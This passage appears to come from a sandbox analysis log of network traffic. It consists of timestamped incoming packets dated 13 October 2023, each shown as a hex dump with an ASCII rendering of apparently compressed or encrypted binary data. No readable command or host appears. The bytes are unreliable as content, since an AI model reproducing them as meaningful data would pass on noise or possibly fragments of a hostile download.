2023-10-13 13:21:16 UTC	9566	IN	Data Raw: 95 cf 33 22 66 a0 cb c3 2d 9f b9 4a 3f ad 75 92 75 6c 20 ec ff b5 5e 09 ec 75 0e 2d 57 c7 06 f2 e2 76 f4 6f 5e c5 77 0d 14 26 c8 73 f1 3c 73 1e e8 0f bc cb 6b e9 e2 48 d9 05 ff a3 3c f3 70 9a c5 62 f4 9d fb ad 93 63 ee c9 12 a1 35 80 4c 52 c4 10 8d 99 a9 b1 7b 58 36 b5 8c 10 9f 9b 80 a8 27 58 2e f6 10 65 a3 96 13 f7 61 f0 e9 0b da 8c b1 a9 90 41 57 c2 41 23 23 79 6e eb e2 61 27 62 7c cf 71 0e 60 8c e2 b6 5a ad 31 b2 b3 04 5e 6d 4d cf 59 ad be e8 a7 0e d8 e6 43 6b 36 b5 7d 3a 84 8f 6e d5 d1 18 fd 2b 9c c4 09 00 62 6d 75 de ad d1 e3 d9 74 7a 28 b5 20 de 3d 2c 34 a4 44 b4 97 90 10 c2 a3 30 0c 0b 18 43 0d b8 29 22 c6 8b a9 b0 eb d3 a4 14 59 99 ef be ae a8 c4 fd 41 16 bf 03 5c f2 5d 33 94 19 6c 65 07 b0 ac 9a 6c ee 5f 9e 80 58 cc 79 3b f0 93 4d 85 f1 3c 2f 91 Data Ascii: 3"f-J?uul ^u-Wvo^w&s<skH<pbc5LR{X6'X.eaAWA##yna'b\|q`Z1^mMYCk6}:n+bmutz( =,4D0C)"YA\]3lel_Xy;M</
2023-10-13 13:21:16 UTC	9582	IN	Data Raw: 8e 1c a5 08 3a 82 b8 6f 05 84 7b 3b ab e2 1d 55 51 d6 26 14 94 11 89 9f b0 95 81 89 22 6c d7 a9 fa 45 60 62 77 40 82 18 0a 0d c7 d4 bc 3f ac 66 de a2 8d 64 8a 55 a6 19 73 cd 1a 70 c7 76 8f a0 25 79 22 f7 87 49 45 39 c2 10 8a dd 0c f7 97 9e da 5b 57 44 93 9a f5 4c 15 69 be 60 2b 22 0d 3f 4c de 42 2d a7 8c 8b d9 6c 0a 4c f3 a0 e3 2e dd 79 8f db 4f ca a0 0e 83 12 ef 97 f5 88 d5 ea 5c 04 18 a4 54 7b 8a bf 5b a0 f0 36 34 5a 36 51 52 91 c0 ba 05 cc c8 b8 7b d3 31 0c f2 c9 24 f7 ec 70 2a 0b 25 29 12 40 61 df 61 f2 cc 45 15 95 e5 f8 19 1e 24 4d cc 78 99 71 0f c8 d7 17 45 37 80 cd 4d de c4 c7 1f ba aa cf 6f 5f 0d 30 0e ba d5 23 b1 de bc 83 b5 89 ee 68 82 77 65 ee b4 06 a1 03 8a 58 c7 d1 fe cb f2 49 57 34 54 c9 0a f7 bd c6 cf c9 f7 7b 20 7e cb e3 66 ea ab 2c 17 5a Data Ascii: :o{;UQ&"lE`bw@?fdUspv%y"IE9[WDLi`+"?LB-lL.yO\T{[64Z6QR{1$p*%)@aaE$MxqE7Mo_0#hweXIW4T{ ~f,Z
2023-10-13 13:21:16 UTC	9598	IN	Data Raw: 09 fb 6b fd b5 b8 6a 5f b5 f8 06 0e 69 64 f4 66 f9 80 91 7e 41 ba 60 6b 54 ed c6 88 86 1a 4f 88 ba b5 f0 84 a0 bb e3 9f fa c8 86 11 fe cf bf 72 c0 05 ba d4 05 29 41 9c 26 9c 8f 0f 85 2f fa e1 85 17 07 94 0f 33 6b 5c d4 c3 4e 3d 51 41 bf c8 c4 6f 35 a6 9a 11 4e 4b 82 9d 4f 70 2f 63 81 c4 ba db 45 4a 7e 27 67 3c 89 6d 18 13 6f a2 5d 07 85 71 40 39 cd 56 0d 64 e9 02 5a cc 3d ec 03 1e a9 31 9e e9 d6 7f 7a 24 9e b0 b9 9d 9f 3e 86 68 0e 93 c1 6c d5 91 df 2f bd d9 44 4a 83 8f 13 37 a5 8e d9 6e d9 07 ee 0a 3c d4 aa 32 87 94 09 3c b2 69 9d d3 f5 74 da 23 87 12 04 c4 a9 66 62 d2 92 1e 2e 36 c1 67 d2 9d e3 36 47 f9 00 f6 d4 a4 fb 38 1d cb 4f a7 d2 b3 24 c8 0e 9d 1c 5f bc 78 0d e1 df e1 53 4a a7 b1 7a 8b 20 e6 cf d9 a6 ea 3c d7 40 f3 21 cd 5c 9f 4a 08 7a 31 c3 24 14 Data Ascii: kj_idf~A`kTOr)A&/3k\N=QAo5NKOp/cEJ~'g<mo]q@9VdZ=1z$>hl/DJ7n<2<it#fb.6g6G8O$_xSJz <@!\Jz1$
2023-10-13 13:21:16 UTC	9614	IN	Data Raw: 5e f5 82 fb a3 1a 9e ef 6e 37 26 50 71 34 0a 8c 08 18 ba 99 68 78 b8 88 54 11 33 7f 86 e3 ae 48 6f 21 1d 54 b3 96 16 28 02 07 a8 c5 fa 13 59 fe 51 47 58 dc 66 6a 0d dd 43 a4 b8 62 ae fb 86 86 d9 3e 61 24 b3 9c 56 3c ad 58 74 6b 43 5c 21 3d c7 63 0c 6f 59 eb a1 f5 08 65 36 40 8b 3a 3b f6 93 57 46 f7 be e7 f5 67 ac a2 4f 84 47 a6 ce 5c a1 79 22 66 d1 eb b9 05 65 27 40 77 ec 6c 65 97 72 80 50 3f 7b d6 9a 83 03 bf 46 3a 49 8a 3d f7 ad 7c 22 31 90 a2 41 ad e5 8f 4e 69 80 f3 c0 60 0f 1e 8a 2d 54 16 d9 a4 53 84 a3 2a de 18 75 68 c4 fc 61 48 69 e1 d7 98 63 7e 74 4e fc d5 f7 fe 66 ba 26 e4 ad 65 bb 84 38 f3 0b e5 cb d9 e3 9a 33 97 ea 0f 6f 54 80 0a b7 7d 10 1e 2e 3d b2 59 84 41 83 be 65 f2 7e e5 b2 d0 f1 72 d1 47 b9 bc b3 f1 b7 e8 ba 0c 8c 78 44 9e cc 36 1e 78 a9 Data Ascii: ^n7&Pq4hxT3Ho!T(YQGXfjCb>a$V<XtkC\!=coYe6@:;WFgOG\y"fe'@wlerP?{F:I=\|"1ANi`-TS*uhaHic~tNf&e83oT}.=YAe~rGxD6x
2023-10-13 13:21:16 UTC	9630	IN	Data Raw: f9 9e 11 18 60 32 19 3d 65 aa 73 74 6f 8d 16 26 18 42 32 f2 ba 04 f6 ac b7 e0 1d 81 31 bf 6d fe ad a5 de 32 ab b4 d6 6e 83 29 70 c8 45 f5 0b c5 12 b6 68 11 96 6d 08 12 6e 57 28 b1 41 1b ae 38 43 00 ff 95 0f 57 01 e3 a0 19 5c 1a 0d a2 10 a8 97 a0 04 20 55 b7 ea ff bd fe f9 e2 71 6c ab 7c 85 84 d3 46 94 63 8b e7 70 2b a9 20 6d 7e 68 35 b5 97 bd ab cc 8a 0f 41 e2 4a b5 b5 d5 49 41 5b 13 42 d7 1e 2d 3d 44 9f 9c 7d 02 5a 19 9c dc 11 89 4c ac bf cc 4f c9 ba 12 01 1c 77 37 40 fe 06 69 c0 db 69 11 5c af 44 22 a8 ee 57 e1 71 9f 82 a1 06 37 e4 38 88 71 b1 c3 ff be 85 ca d3 10 a9 00 67 2e 94 25 a5 4a 77 aa 75 7f 06 5f b2 f6 f5 de 61 0b 3e a7 1c 31 2a 96 3d 30 89 7a 85 9c ac 1a 7b 17 92 f2 58 a6 34 13 62 c4 e9 2e cd e6 dc 60 45 a2 5a 57 db d7 1d 18 07 b1 5f 3e 3b 91 Data Ascii: `2=esto&B21m2n)pEhmnW(A8CW\ Uql\|Fcp+ m~h5AJIA[B-=D}ZLOw7@ii\D"Wq78qg.%Jwu_a>1*=0z{X4b.`EZW_>;
2023-10-13 13:21:16 UTC	9646	IN	Data Raw: 8b 08 3e b1 c2 fd 2c 90 57 75 92 66 56 a0 88 b9 33 c3 7f 9f a9 06 4b 42 77 58 35 da 9b a6 2c 35 8c f3 42 86 ad 1f 46 00 45 38 ea bf 7a 4e f4 cf 1e be 9c ab e4 2c a1 2a 01 0e 13 49 a6 f4 cd 3e 8c 7a 57 d9 df ff 24 a2 62 7f fb 8b 5a 6b 3b 4b 2c 3b d2 18 0c b1 b5 3f 67 c1 70 b7 ea 75 4d ac 9f 20 71 ee fc 47 20 7b 76 3d 9c 66 e9 3e ff 37 40 16 1c be 73 bf c0 15 cc 6d e2 1e 01 62 83 9f 7c a5 2c bb 78 04 df ac 4e 99 66 d8 69 79 4a 3d 7d 9d 02 87 e4 5a 77 d4 ad 76 86 14 0e de 5b c3 73 bc 08 9e 08 68 03 d9 86 3b 2f 3a 53 80 af 9d 1f e8 2d 80 1e b2 02 fc c1 ac b3 2e 5d 95 e8 56 c3 84 29 f2 81 cd 30 35 42 11 b2 8b e7 7f 6d 58 42 06 3f db 75 e8 4a 89 b3 75 56 e9 f4 5d 07 c9 2c 5d 35 23 89 00 a0 96 8d b1 02 4f 86 d2 aa 7b 6b e1 ed 2f de 2a 3f 38 40 c0 e7 ca 72 12 54 Data Ascii: >,WufV3KBwX5,5BFE8zN,I>zW$bZk;K,;?gpuM qG {v=f>7@smb\|,xNfiyJ=}Zwv[sh;/:S-.]V)05BmXB?uJuV],]5#O{k/?8@rT
2023-10-13 13:21:16 UTC	9662	IN	Data Raw: 2a 4c bc 6c 90 57 4b 42 bc 76 42 05 90 09 35 25 84 0d 50 dd 76 1f d1 ec ba 5a fa da a8 3a 1d 37 32 6e 32 90 40 d3 cf b1 45 37 8b ed 98 46 1f 90 a8 81 bb a5 f6 ee 40 a0 da b9 09 b3 4a f7 9d e4 73 e2 69 c3 a5 89 89 72 5f f8 bf 7d 02 3f 18 f2 ed 16 f2 80 f8 d7 e5 0d d2 54 31 73 48 19 5f b0 1e 7d df e2 40 9f c1 a1 8c 16 5c 72 68 05 d9 a2 1b 98 a1 6c 84 81 7e 99 2c 9a 99 16 77 56 76 5a 50 20 be 76 21 ae 12 3a 55 ea 6c 28 6a cd 35 64 f9 91 5f 55 83 a1 04 2f 67 99 86 8a b5 de a5 47 a7 0a 76 51 92 38 52 b1 a8 e0 73 66 ee d7 c4 1d cf f7 f1 1c be 6f aa ef fc d5 ee 46 95 54 e9 b1 f5 2d ec 25 93 dd 09 7d e8 27 9c da d8 1c b0 a4 39 96 7f 4a cb c2 9c d3 c6 f3 7c d2 8d 40 7e 6e e3 d8 a4 fa d0 37 a6 74 8f 0c c8 68 21 28 62 d5 f9 19 ba 8c 22 cf d1 47 34 84 f4 1c 0e d6 88 Data Ascii: *LlWKBvB5%PvZ:72n2@E7F@Jsir_}?T1sH_}@\rhl~,wVvZP v!:Ul(j5d_U/gGvQ8RsfoFT-%}'9J\|@~n7th!(b"G4
2023-10-13 13:21:16 UTC	9678	IN	Data Raw: b1 18 d6 09 9f 52 21 39 38 6b 9f ab 95 ce 82 a0 eb e5 6b b1 5a 48 05 61 4d b4 10 ca ed 4f 97 97 28 03 ab 72 61 3b 1d 0a 52 df 09 38 d8 34 9d a7 39 40 5a 21 e8 12 64 40 c8 3c 1d d8 93 04 4a 74 81 cd 29 ef b1 a8 65 f9 0b 18 1b c6 cd ca d9 12 05 7e 6b 69 e6 ac bc 1a f7 b7 66 32 9d e5 d8 c4 68 6c 08 31 f2 9e a5 92 02 1b 64 94 c9 9b 2f 19 74 c9 94 2a ad 09 e0 1a fb 49 f9 c9 ec 1c 07 f5 6d 7c 1f 69 66 f1 9b 29 b5 bf eb 3d 98 02 d8 83 01 ef 83 c0 4f 6e 3a 43 b9 39 81 95 4f 2b 3f bd c7 6f 1f c1 fb 43 22 8e 99 f1 08 34 6b 50 df 18 41 89 fd ed a1 2c b8 6d 35 56 4e b7 6b 56 8f 28 6a bb d4 31 28 6a 40 50 12 09 08 2a 81 d6 1f 55 9e f5 3d 3b 94 00 11 8e 97 16 63 de 1b 89 2c 32 e5 43 e5 28 e4 61 83 aa 31 e4 d1 fe cf 0d 2d a9 87 2c 55 c7 07 3d 76 ba 45 c1 a6 9f 28 d1 74 Data Ascii: R!98kkZHaMO(ra;R849@Z!d@<Jt)e~kif2hl1d/tIm\|if)=On:C9O+?oC"4kPA,m5VNkV(j1(j@PU=;c,2C(a1-,U=vE(t
2023-10-13 13:21:16 UTC	9694	IN	Data Raw: 4b f4 48 8a 33 c9 06 f0 30 d0 40 06 7a 5e 87 eb e6 cd 71 2e e2 01 aa b8 88 d9 3e 5a 56 54 38 d5 a8 06 7c af 38 a5 31 69 e3 07 70 e0 46 14 01 3b 4e 38 0e b5 23 ad f6 1d f4 a8 49 52 43 77 c0 c6 41 4b 06 0a d7 eb b8 d4 3b 7d c3 cd e1 65 50 cf 9d 38 9d ea 84 d8 a4 c3 ab e3 9f 01 c7 9f 47 83 e0 93 30 c1 26 e0 40 75 cb c8 14 de 46 ba 9e 42 4e 54 4f 50 04 fc 78 71 9a f7 a4 0e 97 6e e5 cf 62 69 47 16 b4 02 f3 83 27 cb a5 ee 4f cc ef 56 de 94 db 22 87 d4 6a e9 f2 f8 fe 81 09 a2 18 91 c7 d6 d3 46 d8 b6 f2 ff b1 2a 80 21 7e 26 72 3a c0 91 44 35 1e 5e 99 88 e3 47 9b ef c0 49 97 fe 89 58 2a 90 14 a7 ed 62 e0 c1 19 d1 0e ae de 77 50 58 7d 51 28 76 03 97 5e 57 d0 99 64 0e 04 72 c1 9c 0c cb a9 f3 53 a3 08 16 11 fc aa 01 26 3a 56 68 0a 1b c3 ed f0 ba c1 89 24 1f 47 60 50 Data Ascii: KH30@z^q.>ZVT8\|81ipF;N8#IRCwAK;}eP8G0&@uFBNTOPxqnbiG'OV"jF!~&r:D5^GIXbwPX}Q(v^WdrS&:Vh$G`P
2023-10-13 13:21:16 UTC	9710	IN	Data Raw: f5 c3 5d 6b 0b 60 e0 52 f8 6d 6d ef cd 40 ae 7f 3f b5 ea 6e e6 9c 89 f0 18 a3 0e 78 9b cf bc 96 e3 0a 53 c8 9e 30 b7 7b aa cb 5e e0 c8 3d de ab e6 5c 64 8f d0 03 6d 5a 3f d0 a6 01 6e 78 3e 84 6b 1a 61 80 58 6f 0a 10 a2 f6 17 1a fc 6d 56 c7 97 3c fb c2 c4 c4 94 91 df 90 72 a0 4c b6 ac 32 a6 2b 4c 5b e2 31 7d 0c 8f 2b 3a 47 59 58 ed 33 19 90 01 dc 0f b5 27 c7 65 c7 e9 e6 bb 29 cd 18 17 72 a5 0b d4 90 c2 f3 78 7f 5d 0e 65 0e 65 c0 59 43 c1 da af 78 ba 8e 14 2a 51 09 8d 8a 85 bc 66 4e e8 d7 16 86 7f 72 16 62 70 a8 c1 b4 c6 9d 0e 44 ee 34 d8 21 0e 8a 1f e3 4d cc de 77 20 42 a1 32 9e 15 1d 35 95 bb d3 4c ec 79 fd fa 72 f7 3b 76 dd b4 6d 3a 3e d6 d2 e5 fd 67 5f 97 34 07 1e 71 f4 21 e4 ec d7 84 a2 a4 34 9f 50 6f 48 da af db db 74 d6 72 61 e6 04 7c bc b1 0a d4 0b Data Ascii: ]k`Rmm@?nxS0{^=\dmZ?nx>kaXomV<rL2+L[1}+:GYX3'e)rx]eeYCx*QfNrbpD4!Mw B25Lyr;vm:>g_4q!4PoHtra\|
2023-10-13 13:21:16 UTC	9726	IN	Data Raw: f9 95 38 e8 22 b9 20 a8 e0 9d 72 d7 5c b8 6c a5 51 f7 85 9b 93 b7 ef fd 14 e5 4d e4 91 51 4e 62 c5 dd b5 03 d1 0a 89 36 82 62 41 e7 14 d6 11 92 0d e6 8b d4 f7 c4 d6 ce d5 00 c2 b8 54 85 35 08 e4 cc 42 2d 05 3c 63 d7 65 ff 21 4c e8 04 33 84 12 28 28 d5 48 85 9b 22 c7 26 4b 26 cf 2c 05 46 28 32 8c 25 8e 8c 71 48 61 c6 a3 12 ec 66 50 04 2d e6 c2 d3 15 1e 12 53 90 2c bd 28 b9 0e 04 61 ac 77 be 7e 9b 41 03 87 02 6c f3 37 d2 15 cb b2 4d 91 ff 26 09 16 a3 35 56 0d ce 42 43 fb d7 f3 97 7e dc 9a 53 ff 21 5b 94 4b 3b e8 90 86 b1 10 e6 be 37 82 40 18 51 dd ff 03 c5 dd e2 b4 58 61 bf 46 e2 25 44 fa f6 a0 23 c3 81 85 a2 7e 84 77 dc 78 a8 64 30 be af 8e c2 5f 46 f5 3e 60 fc 3b ad 50 21 b4 a1 46 31 c0 fb bc 8c c9 55 4d 1c e0 27 ba df 2c ca 97 65 70 79 2b 7e 54 82 8f 08 Data Ascii: 8" r\lQMQNb6bAT5B-<ce!L3((H"&K&,F(2%qHafP-S,(aw~Al7M&5VBC~S![K;7@QXaF%D#~wxd0_F>`;P!F1UM',epy+~T
2023-10-13 13:21:16 UTC	9742	IN	Data Raw: c6 41 74 db 02 23 3e 3e e3 1e a4 dd 3b 56 af 7f 5e ad 45 5e 75 1c ae ea 7e e3 a1 8c e7 b3 d8 7a 40 1d 2d 38 9b 3a 9a fe 34 a7 a1 eb e2 86 8e c8 c8 34 bb a9 16 63 bd a2 cd 35 8c 4f 3d f0 ea 1d 4e 4b 06 f4 97 77 0a 50 3c 03 9f ba 8b b3 58 d4 38 d0 48 50 ab 83 cb 70 71 27 9b b1 cd d8 a4 57 d3 c5 16 6e ef b3 9f cc cf ec f6 6d 48 f3 9f f4 76 62 b3 bd 8b 70 8b 29 b7 88 8a c5 12 fd a5 63 8a c5 6d 16 e9 84 be f5 00 43 20 b1 49 e4 12 65 c9 e3 60 83 47 63 8f 47 7d 14 6c 9b ec 9e d2 9e dd 84 b6 0a 76 25 b6 6e 65 37 a9 8c c3 72 6e ac 7f bc bb b5 ae 50 f2 20 7b e0 04 a1 3b 11 b1 32 e0 7c a1 69 38 37 65 de 04 5b 3c 61 ad 30 0b ce b5 22 1e ab a9 5d d8 c4 4c 59 e1 d1 40 f7 03 4a 4a 17 56 f8 6f 4a cb e6 f4 8d 52 98 a2 57 20 64 12 67 e6 e7 d4 08 ed 18 cd ca 0a d6 7e 15 2c Data Ascii: At#>>;V^E^u~z@-8:44c5O=NKwP<X8HPpq'WnmHvbp)cmC Ie`GcG}lv%ne7rnP {;2\|i87e[<a0"]LY@JJVoJRW dg~,
2023-10-13 13:21:16 UTC	9758	IN	Data Raw: a0 98 4c 59 27 2c a3 dc 54 f1 d1 51 3b 90 67 63 d3 ff 45 42 3a 13 f7 eb 09 f0 6d 4f b4 3f 43 b7 d3 dc b6 ba 51 d9 80 0f e4 90 e3 d2 49 c4 9c cc ac 22 e7 51 76 01 16 c6 93 63 49 f6 75 7e fd 7c d3 14 28 44 a6 4d 1a 60 cd 8a 4c 2e 9b 3d b3 c7 de 32 e4 cb 37 2b 00 13 da e2 8a 9e 8b d9 14 85 d3 87 35 d2 30 a8 05 c9 44 89 0d 9e fe b1 fd 42 05 c5 d7 ff ed 22 0c 00 70 f7 fc 90 b5 37 4f 45 b6 c4 d6 62 01 d3 05 cb 81 9b be 6d 73 2c e9 a0 4f 40 ac a7 66 a5 06 37 65 0c ff 14 09 ea d0 88 85 29 a5 20 c0 32 08 00 13 2b bf 19 30 fe 86 96 25 19 6a 81 42 ea a4 50 a8 ef a8 bc 2e b3 d9 d6 2e aa ac 59 dc 26 11 f1 1c f3 c7 89 d3 24 b8 75 7a 71 cf 29 4d 93 14 d3 05 8a 27 da 37 42 e4 89 d3 7e c4 07 02 4f 9c ef 97 25 c0 7c e6 2a 1e 4c f0 9d 09 19 0c 2b 6b 82 af 42 bb 0c 1a a8 18 Data Ascii: LY',TQ;gcEB:mO?CQI"QvcIu~\|(DM`L.=27+50DB"p7OEbms,O@f7e) 2+0%jBP..Y&$uzq)M'7B~O%\|*L+kB
2023-10-13 13:21:16 UTC	9774	IN	Data Raw: 0d 70 dc 99 88 da 18 ec aa 88 39 48 ef 98 d7 f0 40 1b 59 c9 4f 18 0c a6 9d 61 a5 9e 33 b2 2e 1a 54 cd 1d fa 04 64 54 79 cf 77 66 62 42 92 bc e6 8f 24 32 84 ee f7 4f af fe 03 5c 4b da 2c d8 c4 fa d5 6c 6b 8e 22 98 d8 24 a0 36 89 ed 93 d1 e5 0e fc d1 9e a1 68 1b 77 40 a3 0e 19 e9 6f b8 16 0c 19 e4 91 c7 9b 94 0c f0 17 26 aa 3e 61 95 0c 6c 1f bc 2b 29 2a c4 0f 25 b6 57 71 1b d1 a7 82 55 5c 69 ea f7 3e ec 81 4a 91 19 66 19 0e 2a f0 d2 0f 9e 03 d4 82 7f c7 eb 35 b2 32 ba c4 50 24 21 b5 bd b3 75 b9 78 9f d4 1c e6 c3 68 ac 05 74 2a 42 ea a1 09 82 21 eb be d0 43 54 8a 82 c5 cd d2 54 49 33 cd 9c 18 0d 49 43 f8 66 ab 7b f6 4a 7d 83 ad 1c 04 e8 11 4f 62 3f f8 96 2a 64 95 d2 f2 d3 64 12 b8 7e 42 10 6b df 9a 5a e0 a7 6b 34 57 f6 8c 7d c6 8a 5f f9 17 6b e4 31 27 5e 0d Data Ascii: p9H@YOa3.TdTywfbB$2O\K,lk"$6hw@o&>al+)%WqU\i>Jf52P$!uxhtB!CTTI3ICf{J}Ob?dd~BkZk4W}_k1'^
2023-10-13 13:21:16 UTC	9790	IN	Data Raw: 7e da be 0c bb 41 d6 0b ac 77 46 28 8d 98 28 b4 2a e3 9c ad c6 34 15 bb 04 27 6f 69 22 c7 b5 17 b1 53 22 14 f8 34 b6 40 b9 3a 4a ba 01 96 63 ba ea b1 0a 65 b4 9e 89 f0 7e 76 fe 7c 99 d0 09 87 05 2d ef d0 1c 97 2f 66 d4 92 b8 f4 49 ae 3f bb a7 75 7a c1 d8 f8 d4 d9 1d bc 94 22 6b 28 23 8a 3a 62 fa e7 10 41 7b db 02 cb e8 60 57 2e d8 4c 4d c9 d3 14 bf c1 fc 39 49 b1 6c 59 50 24 d9 48 b9 80 e8 68 75 9c 0a f9 3c 38 bf cf c2 7c a7 ab a8 da e7 53 11 eb 68 c5 60 48 f6 00 f1 ef 4b 75 41 11 a6 3f 72 a3 e6 0a 42 8f 95 e8 9b ce f8 ca 3a be 84 34 57 75 0f 06 f4 52 fc 8e ed 94 05 f3 75 e5 ea 9a 7c 87 c6 64 9b a8 a0 b2 2d d0 1d a9 df 33 24 7f 46 09 a6 78 10 a6 81 66 b6 ac 12 b0 2e c3 a0 25 e4 68 9f b6 c9 09 f8 01 72 4a 8e 21 56 70 ea bd 33 a4 79 e5 28 c4 05 ca 8e 17 40 Data Ascii: ~AwF((*4'oi"S"4@:Jce~v\|-/fI?uz"k(#:bA{`W.LM9IlYP$Hhu<8\|Sh`HKuA?rB:4WuRu\|d-3$Fxf.%hrJ!Vp3y(@
2023-10-13 13:21:16 UTC	9806	IN	Data Raw: 59 f5 4e a2 38 5d 51 30 3a 53 a2 18 de c0 39 57 66 55 9b 3f 10 7c 03 6d de da 4f 53 b7 7d 86 e0 83 e4 01 71 b1 6e 56 3a 51 d4 bd e9 6f 16 08 2c 6c d4 fc fa 67 93 ea 19 b2 9b f5 04 33 06 9d b7 c7 4f 2d d2 23 2c ea b6 a6 4c 0e c9 eb d8 23 b5 a8 f1 26 99 86 b0 4b c4 1d b3 79 18 45 c7 f5 76 55 4e 83 ea b5 c9 cc be 15 f4 3d e6 05 9f 68 bb 74 3e 24 db 55 7f 4f d2 c8 1d 01 b9 0f fe ca 5b 1b cc a0 5f c0 96 8a 89 d7 a7 51 ce a2 e9 3b d4 cf 2d 65 2a 25 e5 24 87 b7 75 36 9d 14 7e 5b e4 8f b4 cd 85 2f 5a 5a ee 85 b8 61 43 f5 5e 87 ac 81 f4 e3 03 f2 18 55 32 cd 24 7c 8a c0 73 8d 2b 9f 07 bc 0f 62 20 69 d9 10 3b e7 ed 94 c8 27 bb ea 9f 06 2c f3 fb 31 73 eb c5 67 af f3 9c a3 aa c9 c1 d9 ea e6 c4 5e d9 5d 32 9b 44 eb 43 b8 a6 1d ff 8d 84 98 51 ee 2c 6a 89 f5 34 e8 76 4d Data Ascii: YN8]Q0:S9WfU?\|mOS}qnV:Qo,lg3O-#,L#&KyEvUN=ht>$UO[_Q;-e*%$u6~[/ZZaC^U2$\|s+b i;',1sg^]2DCQ,j4vM
2023-10-13 13:21:16 UTC	9822	IN	Data Raw: ef 76 87 8c 56 53 60 1b 0b 20 df 28 85 f1 dc 8e 5d f2 f7 78 91 d8 22 39 4f 93 06 a0 46 2f 24 d6 1a d1 fd 7d 2f ae 17 14 46 ee fb d4 94 3c e1 42 f8 47 69 95 a2 7f 17 dd 9b 4a cc 29 ad 2b 35 01 26 c9 af 7f b3 3b 76 0e 09 20 f7 9d bf 2b 46 5e 7c 98 69 a3 d0 65 c3 cd e8 ee 5e 6a 52 5a 85 96 34 eb b8 d6 f1 dd 19 e9 21 b7 03 f5 fe 02 4e ed 1d 9c 7c 62 8e 53 27 36 34 e9 c1 d4 cc 59 1c 90 da cd 51 a0 7e ae 77 9d 59 26 f6 23 47 41 36 da c1 54 93 bb 93 90 08 94 d4 b3 1d ad df c6 2d 24 33 67 70 43 ca 94 ce 9d 67 f1 82 30 87 2d 88 0c 41 35 ef 3a 27 e1 f0 38 c4 c4 d8 95 c2 ac 48 93 d4 2e 71 ed a9 00 c8 ff 7e 5d 5c 18 25 95 de 04 28 19 4e 39 9c e5 cd 97 1b 76 7b 52 42 23 97 a8 f0 24 f9 5d 5e 18 0d ab fe d2 c9 a7 89 18 e9 47 72 ca b8 27 2c ea 1c 16 3f 26 3a 78 44 a8 1d Data Ascii: vVS` (]x"9OF/$}/F<BGiJ)+5&;v +F^\|ie^jRZ4!N\|bS'64YQ~wY&#GA6T-$3gpCg0-A5:'8H.q~]\%(N9v{RB#$]^Gr',?&:xD
2023-10-13 13:21:16 UTC	9838	IN	Data Raw: aa e7 38 ee c4 70 aa 76 ef 64 af c4 63 0b c6 1f 50 d6 d1 0e e6 a4 93 f7 0e 5a 4f 24 b9 1a 0c 5d 5f 61 6a b9 6b d5 bc 6c 94 f0 ee 4c 1f 6b 94 f2 4a b8 89 50 55 2c a0 8f 98 40 53 6a e6 ff e2 46 00 5e 3b a5 a0 00 fd d5 35 f5 72 28 9f a4 58 f1 9d 74 f0 26 e9 51 d2 1c f6 44 bb 9b 50 3d b3 d4 59 bc fd be 47 3f b2 26 ce 55 18 8b 55 19 4e 4d 90 99 6c a4 0e ea c2 18 8a 47 be b4 e9 8e 97 2b 5a 13 51 ba de 4a c4 c6 38 8a 4d 4c cc 7f cc 8c 83 50 2b 92 10 10 62 c4 34 ff 5e 51 6b 5f 2c 0a a1 72 60 d1 9f 5c fb 42 b4 6d bc 63 9f 0e a6 40 45 66 b5 59 52 9f 45 89 a2 e1 1e 7a d9 b1 94 39 ca 0d 9a ca a4 ef 17 46 f3 3d 2f 49 83 19 3e 5e 7b ab 44 b2 ce 3a 95 ef e4 d7 16 a5 8a 19 60 25 6c 10 28 83 26 05 e2 17 f3 33 a4 c6 73 42 90 4a 43 0a 1e 36 78 79 07 0d ff 17 40 90 cc 02 97 Data Ascii: 8pvdcPZO$]_ajklLkJPU,@SjF^;5r(Xt&QDP=YG?&UUNMlG+ZQJ8MLP+b4^Qk_,r`\Bmc@EfYREz9F=/I>^{D:`%l(&3sBJC6xy@
2023-10-13 13:21:16 UTC	9854	IN	Data Raw: cd bf 61 22 c2 93 55 f8 35 92 14 7d 2b 08 d5 ff d8 06 e3 05 27 95 82 f7 9e 39 80 2f 44 19 92 1e 6a 20 86 d3 7c 98 86 03 4b 5b 12 5a 4c 01 46 64 9f 98 4a 1d 52 46 e5 f7 36 27 f2 6d 6c ae d7 81 65 61 56 7a 7f 7e 71 64 c5 99 8a 1a 08 1f 3d 75 55 ed 67 bc b9 aa ef f4 20 cc 12 40 f9 d2 f3 97 39 4a 2a 4c 1c 0f 04 f4 74 44 1c 9e f6 af 4a 17 54 90 ad e7 92 8e 36 a1 7b 6d 77 69 0d 76 4b 13 73 d5 32 64 dc c5 89 17 83 7a 5e 14 7a 88 a5 02 60 71 7a 05 8c 96 cf 83 dd 1c e5 37 59 18 d5 b8 24 f1 e9 c3 f9 07 c5 a0 fc 2f cb 60 9f cd a8 5a ab 89 29 79 04 ee 5c 53 05 dd 7e 81 49 17 92 df d8 a5 5a 3c e6 bb 18 05 5d 5d fd d8 49 e6 40 eb 40 99 8f 5f 59 dd 58 ab 86 bc 56 d5 48 e2 ab f1 5d 50 d2 ad 55 55 8f 65 9f 05 4c d2 52 63 7c 16 01 61 9e 50 2b 06 e3 ce e9 8b 57 8b 08 e3 c0 Data Ascii: a"U5}+'9/Dj \|K[ZLFdJRF6'mleaVz~qd=uUg @9J*LtDJT6{mwivKs2dz^z`qz7Y$/`Z)y\S~IZ<]]I@@_YXVH]PUUeLRc\|aP+W
2023-10-13 13:21:16 UTC	9870	IN	Data Raw: 1e 07 7c 42 0b 42 72 3a e9 0e 1f c8 41 d0 25 d2 60 4f c7 99 50 55 e6 67 d4 b4 5c 94 44 7e 88 4b 3d bb a1 76 c1 bf 04 5c f2 95 6e 60 da 31 7f 80 dd 07 73 36 2e b4 02 7f 21 39 ee 30 06 ac 11 4e 41 e5 a9 04 d0 3d eb 66 c5 2a 40 8d 81 23 62 61 a3 d9 5d c7 f0 14 6c d4 85 d6 a5 36 3b 31 c5 8d 27 5f ab 94 12 bf d9 dd ad 7e 6f 26 93 33 c9 c4 44 f1 27 42 cb 50 c3 a3 73 13 55 da 86 62 96 8f 20 53 46 cf 7c 8c 4c 6b ce 8d ef 9a 98 81 24 26 9c a7 bd 8f 30 77 cb 23 88 c1 99 e8 05 bd 19 9d bb 0e 3e 89 8e 64 b4 3d ed 52 d6 32 71 d8 52 74 b5 7b 9c 12 3b 2c 14 f8 45 b3 56 ce f9 d2 1a 2a 2b 70 23 63 0a 32 e6 e8 9c a1 ba 11 e7 84 e6 6e de ad 38 a5 9a 0e 40 01 21 5b 74 cf ea f7 b6 ba b2 af 19 a8 4d 94 13 fb b1 ba 56 55 af 2b 19 a7 db f5 cc df 57 57 19 1d 6f 72 